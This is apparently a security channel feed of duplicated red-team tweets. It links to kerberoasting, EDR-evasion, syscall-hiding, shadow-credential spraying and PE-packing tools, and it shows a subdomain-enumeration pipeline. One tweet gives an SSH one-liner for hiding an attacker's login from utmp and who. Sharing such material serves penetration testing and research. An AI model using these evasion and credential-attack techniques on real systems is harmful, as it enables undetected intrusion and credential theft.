๐ [ VirtualAllocEx, Daniel Feichter ]
Nice blog post by @Microsoft in cooperation with AV-Comparatives about "Detecting and preventing LSASS credential dumping attacks"
https://t.co/0tML7Heax5
#itsec #itsicherheit #itsecurity #endpointsecurity #antivirus #lsass
๐ https://www.microsoft.com/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/
๐ฅ [ tweet ]
Nice blog post by @Microsoft in cooperation with AV-Comparatives about "Detecting and preventing LSASS credential dumping attacks"
https://t.co/0tML7Heax5
#itsec #itsicherheit #itsecurity #endpointsecurity #antivirus #lsass
๐ https://www.microsoft.com/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/
๐ฅ [ tweet ]
๐ [ Tw1sm, Matt Creel ]
Created python tooling for the "Roast in the Middle" attack demoed/described by @exploitph in his recent PoC and research. Supports ARP spoofing to targets/gateway - if you can enum usernames and sniff an AS-REQ, basically allows for "unauth kerberoast" ๐คฏ https://t.co/Hdn3wuIx7b
๐ https://github.com/Tw1sm/RITM
๐ฅ [ tweet ]
Created python tooling for the "Roast in the Middle" attack demoed/described by @exploitph in his recent PoC and research. Supports ARP spoofing to targets/gateway - if you can enum usernames and sniff an AS-REQ, basically allows for "unauth kerberoast" ๐คฏ https://t.co/Hdn3wuIx7b
๐ https://github.com/Tw1sm/RITM
๐ฅ [ tweet ]
๐ฅ1
๐น [ snovvcrash, sn๐ฅถvvcr๐ฅsh ]
Woo-hoo, thereโs a new kid in town for initial access credential acquiring! As we know from @mohemiv research, we donโt necessarily need SPNs for Kerberoasting, so itโs time to get ready for RID Cycling with ntlmrelayx[.]py ๐
https://twitter.com/snovvcrash/status/1506286522655461386
๐ฅ [ tweet ][ quote ]
Woo-hoo, thereโs a new kid in town for initial access credential acquiring! As we know from @mohemiv research, we donโt necessarily need SPNs for Kerberoasting, so itโs time to get ready for RID Cycling with ntlmrelayx[.]py ๐
https://twitter.com/snovvcrash/status/1506286522655461386
๐ฅ [ tweet ][ quote ]
๐ [ eversinc33, eversinc33 ]
Had some fun implementing the trampoline technique to make sure all syscalls go through NTDLL into the Nim HellsGate implementation by zimawhit3. Thank you @passthehashbrwn for the blog on hiding syscalls! (https://t.co/YfUqAglams)
https://t.co/IicLY1WkY4
๐ https://passthehashbrowns.github.io/hiding-your-syscalls
๐ https://github.com/eversinc33/HellsGate-Trampoline
๐ฅ [ tweet ]
Had some fun implementing the trampoline technique to make sure all syscalls go through NTDLL into the Nim HellsGate implementation by zimawhit3. Thank you @passthehashbrwn for the blog on hiding syscalls! (https://t.co/YfUqAglams)
https://t.co/IicLY1WkY4
๐ https://passthehashbrowns.github.io/hiding-your-syscalls
๐ https://github.com/eversinc33/HellsGate-Trampoline
๐ฅ [ tweet ]
๐ [ Alh4zr3d, Alh4zr3d ]
Red Teamers, following my previous tweet on hiding procs, now we hide SSH connections:
"ssh -o UserKnownHostsFile=/dev/null -T user@target.com 'bash -i'"
Your user:
- is not added to /var/log/utmp
- won't appear in w or who cmd
- has no .profile or .bash_profile
#redteaming
๐ฅ [ tweet ]
Red Teamers, following my previous tweet on hiding procs, now we hide SSH connections:
"ssh -o UserKnownHostsFile=/dev/null -T user@target.com 'bash -i'"
Your user:
- is not added to /var/log/utmp
- won't appear in w or who cmd
- has no .profile or .bash_profile
#redteaming
๐ฅ [ tweet ]
๐ฅ1
๐ [ HackingLZ, Justin Elze ]
This is awesome Meterpreter Gets BOF loader support for all your offensive needs. https://t.co/01W4UNgD1d
๐ https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
๐ฅ [ tweet ]
This is awesome Meterpreter Gets BOF loader support for all your offensive needs. https://t.co/01W4UNgD1d
๐ https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
๐ฅ [ tweet ]
๐ [ 0xcsandker, Carsten ]
Needed to find where a certain GPO was applied to during last engagement. Hadn't something ready to grab, so now I have. Inline and readable-friendly wrapped code here: https://t.co/EMJ2rJqvYn
๐ https://gist.github.com/csandker/950d11632534c86012ab9c7cb592b7b5
๐ฅ [ tweet ]
Needed to find where a certain GPO was applied to during last engagement. Hadn't something ready to grab, so now I have. Inline and readable-friendly wrapped code here: https://t.co/EMJ2rJqvYn
๐ https://gist.github.com/csandker/950d11632534c86012ab9c7cb592b7b5
๐ฅ [ tweet ]
๐ [ m3g9tr0n, Spiros Fraganastasis ]
PeNet is a parser for Windows Portable Executable headers. It completely written in C# and does not rely on any native Windows APIs. Furthermore it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. https://t.co/MPZvqvocfO
๐ https://github.com/secana/PeNet
๐ฅ [ tweet ]
PeNet is a parser for Windows Portable Executable headers. It completely written in C# and does not rely on any native Windows APIs. Furthermore it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. https://t.co/MPZvqvocfO
๐ https://github.com/secana/PeNet
๐ฅ [ tweet ]
๐ [ KlezVirus, d3adc0de ]
[Video] The 4th episode of my series about Inceptor is out: "Empowering Donut with Direct and Indirect Syscalls".
In this video, we'll show how it is possible to improve the donut loader by intergating it with SW3.
https://t.co/xNK4HNz9qS
๐ https://youtu.be/ypX7N4498xE
๐ฅ [ tweet ]
[Video] The 4th episode of my series about Inceptor is out: "Empowering Donut with Direct and Indirect Syscalls".
In this video, we'll show how it is possible to improve the donut loader by intergating it with SW3.
https://t.co/xNK4HNz9qS
๐ https://youtu.be/ypX7N4498xE
๐ฅ [ tweet ]
๐ [ ippsec, ippsec ]
Starting to play more with Elastic, so just published a video installing v8 it on Ubuntu 22. Really impressed with Fleet so far, the last time I played with Elastic it was a PITA keeping all the agent configs in sync. Fleet's auto update of agents is magic https://t.co/fbQkWgbJKW
๐ https://www.youtube.com/watch?v=Ts-ofIVRMo4
๐ฅ [ tweet ]
Starting to play more with Elastic, so just published a video installing v8 it on Ubuntu 22. Really impressed with Fleet so far, the last time I played with Elastic it was a PITA keeping all the agent configs in sync. Fleet's auto update of agents is magic https://t.co/fbQkWgbJKW
๐ https://www.youtube.com/watch?v=Ts-ofIVRMo4
๐ฅ [ tweet ]
๐ [ dec0ne, Mor Davidovich ]
Introducing ShadowSpray, it's like password spray but with shadow credentials. More info in the repo.
Huge thanks to @elad_shamir for the amazing technique and to @harmj0y (and others) for the implementation in Rubeus from which a lot of code was taken.
https://t.co/nIsnmaitfw
๐ https://github.com/Dec0ne/ShadowSpray/
๐ฅ [ tweet ]
Introducing ShadowSpray, it's like password spray but with shadow credentials. More info in the repo.
Huge thanks to @elad_shamir for the amazing technique and to @harmj0y (and others) for the implementation in Rubeus from which a lot of code was taken.
https://t.co/nIsnmaitfw
๐ https://github.com/Dec0ne/ShadowSpray/
๐ฅ [ tweet ]
Forwarded from Ralf Hacker Channel (Ralf Hacker)
ะะพะฒะพะปัะฝะพ ะธะฝัะตัะตัะฝะฐั ััะฐััั, ะบะฐะบ ะพะฑั
ะพะดะธัั EDR ั ะฟะพะผะพััั python)))
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
#redteam #pentest #bypass
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
#redteam #pentest #bypass
๐ [ n00py1, n00py ]
Web vulns you should look for on an internal pentest: XXE.
We often think of XXE as a way to read local files, but you can also use it to coerce auth. HTTP NTLM does not request signing so you can easily relay it to LDAP. Web service accounts are often over permissioned.
๐ฅ [ tweet ]
Web vulns you should look for on an internal pentest: XXE.
We often think of XXE as a way to read local files, but you can also use it to coerce auth. HTTP NTLM does not request signing so you can easily relay it to LDAP. Web service accounts are often over permissioned.
๐ฅ [ tweet ]
๐ [ HackerGautam, Frooti ]
Not only crawling but you can do Subdomain Enumeration using Wayback.
โฌ๏ธ
curl --insecure --silent "http://web.archive.org/cdx/search/cdx" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty #hacking #infosec
๐ฅ [ tweet ]
Not only crawling but you can do Subdomain Enumeration using Wayback.
โฌ๏ธ
curl --insecure --silent "http://web.archive.org/cdx/search/cdx" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty #hacking #infosec
๐ฅ [ tweet ]
๐น [ snovvcrash, sn๐ฅถvvcr๐ฅsh ]
This is how easter eggs are found ๐ @_nwodtuhs @podalirius_
๐ฅ [ tweet ]
This is how easter eggs are found ๐ @_nwodtuhs @podalirius_
๐ฅ [ tweet ]
๐ฅ2
๐ [ ORCx41, ORCA ]
decided to release this, a highly capable pe packer, with a lot of nice features
https://t.co/iedhKbTlzm
๐ https://github.com/ORCx41/AtomPePacker
๐ฅ [ tweet ]
decided to release this, a highly capable pe packer, with a lot of nice features
https://t.co/iedhKbTlzm
๐ https://github.com/ORCx41/AtomPePacker
๐ฅ [ tweet ]